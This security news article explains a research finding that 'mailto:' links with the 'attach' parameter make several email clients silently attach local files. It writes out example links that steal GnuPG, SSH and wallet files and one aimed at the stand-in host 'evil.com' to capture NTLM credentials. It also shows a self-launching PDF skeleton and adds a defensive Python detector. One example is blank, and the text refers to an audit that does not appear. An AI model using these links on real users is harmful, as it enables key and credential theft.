Attacking email client users with "mailto:" links

Researchers from Ruhr University Bochum (Germany) analysed (PDF) how email clients behave when processing "mailto:" links that carry extended parameters. Five of the twenty email clients tested were vulnerable to a resource-substitution attack using the "attach" parameter. Six further clients were vulnerable to an attack on PGP and S/MIME keys, and three clients were vulnerable to an attack that extracts the contents of encrypted messages.

"mailto:" links are used to automatically open the email client to compose a message to the recipient named in the link. In addition to the address, extra parameters can be specified as part of the link, such as the subject of the message and a template for its body. The proposed attack exploits the "attach" parameter, which allows an attachment to be added to the generated message.

The email clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) and Pegasus Mail were vulnerable to a trivial attack that automatically attaches any local file named in a link of the form "mailto:?attach=path_to_file". The file is attached without any warning being shown, so unless the user pays particular attention they may not notice that the message will be sent with an attachment.

For example, a link such as "mailto:[email protected]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" inserts the user's GnuPG private keys into the message. The contents of crypto wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) and any other file readable by the user can be exfiltrated the same way. In addition, Thunderbird allows groups of files to be attached by mask, using constructs such as "attach=/tmp/*.txt".

Besides local files, some email clients also process links to network shares and paths on the IMAP server. In particular, IBM Notes will pull a file from a network share when it processes a link such as "attach=\\evil.com\dummyfile", which also allows NTLM authentication material to be captured by pointing the link at an attacker-controlled SMB server (the request is sent with the current user's authentication credentials).

Thunderbird successfully processes requests such as "attach=imap:///fetch>UID>/INBOX>1/", which attach content from folders on the IMAP server. Moreover, messages retrieved from IMAP that are encrypted with OpenPGP or S/MIME are automatically decrypted by the email client before being sent. Thunderbird's developers were notified of the problem in February, and it is fixed in the Thunderbird 78 release (the Thunderbird 52, 60 and 68 branches remain vulnerable).

Older versions of Thunderbird were also vulnerable to two other attack variants on PGP and S/MIME proposed by the researchers. In particular, Thunderbird, as well as Outlook, PostBox, eM Client, MailMate and R2Mail2, were subject to a key-substitution attack: the email client automatically imports and installs new certificates arriving in S/MIME messages, which lets an attacker arrange the replacement of public keys the user has already stored.

The second attack, to which Thunderbird, PostBox and MailMate are susceptible, manipulates the draft autosave mechanism: using mailto parameters it can trigger decryption of encrypted messages, or the addition of a digital signature to arbitrary messages, with the result then being uploaded to an attacker's IMAP server. In this attack the ciphertext is passed through the "body" parameter, and a "meta refresh" tag is used to initiate the request to the attacker's IMAP server. For example: ' '

To have "mailto:" links processed automatically without user interaction, specially crafted PDF documents can be used: the OpenAction action in a PDF launches the mailto handler as soon as the document is opened:

%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[…]) >>
endobj
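As an added example of detecting this trigger on the receiving side (not code from the paper), the scanner below walks the uncompressed objects of a PDF, follows the catalog's /OpenAction reference (or an inline /OpenAction dictionary) to a /URI action, and reports any URI that would be opened automatically, flagging mailto: ones. The sample document is constructed from the listing above with a placeholder in place of the elided ciphertext. It deliberately only handles plain objects: a real triage tool would also have to inflate object streams (/ObjStm) and decode escaped PDF strings, so an empty result here is not proof that a file is benign.

```python
"""Find URIs a PDF would open automatically via /OpenAction.

Added example for triage, not code from the paper. Uncompressed objects only.
"""
import re

# Constructed sample: the auto-launching PDF from the text, with a placeholder body.
SAMPLE_PDF = b"""%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[ciphertext elided]) >>
endobj
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
OPENACTION_REF_RE = re.compile(rb"/OpenAction\s*\[?\s*(\d+)\s+(\d+)\s+R")
OPENACTION_INLINE_RE = re.compile(rb"/OpenAction\s*<<(.*?)>>", re.S)
# A URI action: /S /URI ... /URI (literal string). Escaped parens are not handled.
URI_ACTION_RE = re.compile(rb"/S\s*/URI\b.*?/URI\s*\((.*?)\)", re.S)


def find_objects(pdf):
    """Map object number -> raw object body for every 'N G obj ... endobj' pair."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}


def auto_launch_uris(pdf):
    """Return the URIs reachable from an /OpenAction entry, as strings."""
    objs = find_objects(pdf)
    uris = []
    for body in objs.values():
        # /OpenAction [N G R] -> follow the indirect reference to the action object
        for ref in OPENACTION_REF_RE.finditer(body):
            target = objs.get(int(ref.group(1)), b"")
            uris.extend(m.group(1).decode("latin-1") for m in URI_ACTION_RE.finditer(target))
        # /OpenAction << /S /URI /URI (...) >> -> action dictionary written inline
        for inline in OPENACTION_INLINE_RE.finditer(body):
            uris.extend(m.group(1).decode("latin-1") for m in URI_ACTION_RE.finditer(inline.group(1)))
    return uris


def mailto_autolaunch(pdf):
    """Only the auto-launched URIs that would be handed to the mailto: handler."""
    return [u for u in auto_launch_uris(pdf) if u.lower().startswith("mailto:")]


if __name__ == "__main__":
    for uri in mailto_autolaunch(SAMPLE_PDF):
        print("auto-launched mailto: link:", uri)
```

Pairing this with the mailto: audit from earlier (run it over each reported URI) gives a complete picture of what opening the document would do before any client is involved.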


Source: opennet.ru
